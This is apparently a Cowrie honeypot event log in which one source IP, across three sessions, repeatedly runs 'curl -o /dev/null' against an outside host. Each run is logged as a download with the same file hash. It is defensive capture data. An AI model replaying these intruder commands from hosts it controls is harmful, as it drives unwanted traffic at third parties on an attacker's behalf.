{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.328493Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.354857Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.357006Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.358411Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.359218Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.363397Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.364087Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.365758Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.366378Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.370523Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.397183Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.401034Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.403083Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.404569Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.405231Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.410175Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.411031Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.411722Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.413609Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.414330Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.444599Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.446076Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.446811Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.452604Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.454638Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.456559Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.457092Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.458799Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.459348Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.487040Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.487861Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.491059Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.493371Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.496031Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.499822Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.500435Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.502069Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.502765Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.532681Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.533379Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.536594Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.541357Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.541991Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.543249Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.543987Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.547855Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.550468Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.580009Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.581807Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.582902Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.583584Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.586934Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.590053Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.591228Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.592469Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.593339Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.625038Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.625916Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.661403Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.663545Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.667375Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.668534Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.669216Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.673194Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.674011Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.706650Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.707481Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.709584Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.710348Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.713630Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.717040Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:52.718059Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.718795Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.723135Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.726160Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.750535Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:52.752368Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
